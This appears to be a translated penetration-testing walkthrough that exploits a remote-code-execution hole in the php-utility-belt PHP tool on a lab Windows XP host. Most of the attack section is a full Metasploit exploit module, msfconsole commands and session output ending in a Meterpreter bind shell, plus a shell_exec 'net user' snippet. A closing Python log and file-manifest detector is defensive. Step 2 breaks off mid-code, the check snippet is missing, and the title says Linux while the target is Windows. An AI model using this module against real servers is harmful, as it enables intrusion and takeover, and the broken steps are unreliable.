2022-10-02
Penetration testing: using Metasploit against the php-utility-belt application (Metasploit against a Linux system)
Attack machine: Kali 192.168.109.137
Target: Windows XP 192.168.109.141
Application: php-utility-belt (can be downloaded from the link)
1. Deploy php-utility-belt
Since php-utility-belt is a PHP program, it needs a PHP environment; to keep things simple I installed WAMP directly.
Unzip php-utility-belt and place it under WAMP's
$a = "net user"; echo shell_exec($a);?>');
3. Check the files under php-utility-belt
At this point we find that a new file, info.php, has appeared in the php-utility-belt directory.
We look at the content of this file:
4. Access info.php
In the browser we enter the address of info.php to open it.
Here all user accounts on the target machine are listed, which shows that php-utility-belt is vulnerable.
5. Further analysis of the php-utility-belt vulnerability
Press F12 in Google Chrome or Firefox; analysing the page source shows that the text box contents are submitted by POST in the parameter code.
6. Write the attack script php_utility_belt_attack_by_binghe.rb
```ruby
##
# Author: binghe
# Date: 2019-01-17
# Description: Metasploit module for php-utility-belt
##
require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in P
      },
      'Author'         => [ 'binghe' ],
      'DisclosureDate' => '2019-01-17',
      'Platform'       => 'php',
      'Payload'        => {
        'Space'       => 2000,
        # The vulnerability is in a web application rather than a native binary,
        # so DisableNops is set to true to drop the NOP sled from the payload
        'DisableNops' => true
      },
      'Targets'        => [ ['PHP Utility Belt', {}] ],
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']),
        OptString.new('CHECKURI', [false, 'Checking Perpose', '/php-utility-belt/info.php']),
      ], self.class)
  end

  def check
    # Write a marker file through the code parameter, then fetch it.
    # The PHP snippet written into info.php is missing from the source page;
    # the match below expects it to have produced phpinfo() output.
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => "fwrite(fopen('info.php','w'), '');"
      }
    )
    resp = send_request_raw({'uri' => normalize_uri(datastore['CHECKURI']), 'method' => 'GET'})
    # =~ is the regex match operator; the parentheses must be escaped
    if resp && resp.body =~ /phpinfo\(\)/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => payload.encoded
      }
    )
  end
end
```
7. Upload the attack script php_utility_belt_attack_by_binghe.rb
Upload the attack script php_utility_belt_attack_by_binghe.rb to the /usr/share/metasploit-framework/modules/exploits/web/php directory on Kali.
8. Run the attack script php_utility_belt_attack_by_binghe.rb
```
msfconsole
use exploit/web/php/php_utility_belt_attack_by_binghe
set payload php/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
sysinfo
```
The actual session looks like this:
```
msf > use exploit/web/php/php_utility_belt_attack_by_binghe
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141
RHOST => 192.168.109.141
msf exploit(web/php/php_utility_belt_attack_by_binghe) > show options

Module options (exploit/web/php/php_utility_belt_attack_by_binghe):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   CHECKURI   /php-utility-belt/info.php  no        Checking Perpose
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.109.141             yes       The target address
   RPORT      80                          yes       The target port (TCP)
   SSL        false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-utility-belt/ajax.php  yes       The path to PHP Utility Belt
   VHOST                                  no        HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.109.141  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   PHP Utility Belt

msf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit

[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (38247 bytes) to 192.168.109.141
meterpreter > sysinfo
Computer    : LIUYAZHUANG
OS          : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586
Meterpreter : php/windows
meterpreter >
```
At this point we have a shell on the target machine, and further post-exploitation steps can follow.
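From the defender's side, the walkthrough above leaves two visible traces: the module's check() sends a POST to /php-utility-belt/ajax.php and then immediately GETs /php-utility-belt/info.php, and a PHP file the application never shipped appears in its directory. The following script is an added detection example, not part of the original post or of php-utility-belt; the access-log lines and the file manifest are constructed sample data, and the log format is assumed to be the Apache combined format that WAMP writes by default.

```python
"""Detection for the php-utility-belt abuse pattern described in the post.

Indicators taken from the write-up:
  1. A client POSTs to /php-utility-belt/ajax.php (the module's TARGETURI) and
     then GETs a .php path under the application that the application does not
     ship (the module's CHECKURI, info.php). A 200 on that GET means the server
     executed a file it never had.
  2. A .php file present on disk under php-utility-belt that is not in the
     application's own file list.

All sample data below is constructed for the example.
"""
import re

# Apache combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

AJAX_PATH = "/php-utility-belt/ajax.php"
APP_PREFIX = "/php-utility-belt/"

# Constructed access log from the WAMP host; 192.168.109.137 is the Kali
# box in the post, 192.168.109.50 is a made-up legitimate user.
SAMPLE_LOG = """\
192.168.109.50 - - [17/Jan/2019:10:00:01 +0800] "GET /php-utility-belt/index.php HTTP/1.1" 200 5120
192.168.109.137 - - [17/Jan/2019:10:02:10 +0800] "POST /php-utility-belt/ajax.php HTTP/1.1" 200 0
192.168.109.137 - - [17/Jan/2019:10:02:10 +0800] "GET /php-utility-belt/info.php HTTP/1.1" 200 1830
192.168.109.50 - - [17/Jan/2019:10:03:00 +0800] "POST /php-utility-belt/ajax.php HTTP/1.1" 200 44
192.168.109.137 - - [17/Jan/2019:10:04:22 +0800] "POST /php-utility-belt/ajax.php HTTP/1.1" 200 0
"""


def parse_line(line):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_write_then_fetch(log_text, app_files):
    """Return (client_ip, path) pairs where a client that has POSTed to ajax.php
    later fetches, with HTTP 200, a .php path under the app that is not in
    app_files. Lines are processed in log order, so the POST must come first."""
    posted = set()
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == AJAX_PATH:
            posted.add(rec["ip"])
        elif (rec["method"] == "GET" and rec["ip"] in posted
              and rec["path"].startswith(APP_PREFIX)
              and rec["path"].endswith(".php")
              and rec["path"] not in app_files
              and rec["status"] == "200"):
            hits.append((rec["ip"], rec["path"]))
    return hits


def new_php_files(baseline, current):
    """PHP files present on disk now that are not in the shipped manifest."""
    return sorted(f for f in current if f.endswith(".php") and f not in baseline)


# Constructed manifest: what the application ships versus what is on disk now.
APP_FILES = {"/php-utility-belt/index.php", "/php-utility-belt/ajax.php"}
ON_DISK = APP_FILES | {"/php-utility-belt/info.php"}

if __name__ == "__main__":
    for ip, path in find_write_then_fetch(SAMPLE_LOG, APP_FILES):
        print(f"write-then-fetch from {ip}: {path}")
    for f in new_php_files(APP_FILES, ON_DISK):
        print(f"unexpected PHP file: {f}")
```

The log check only sees the request line, so it cannot inspect the posted code parameter; the file-manifest check covers the case where the attacker never fetches the dropped file. Either way the root cause is the same one the post demonstrates: an endpoint that executes whatever arrives in the code parameter, so the mitigation is to keep such a developer tool off any server reachable by untrusted clients rather than to filter its input.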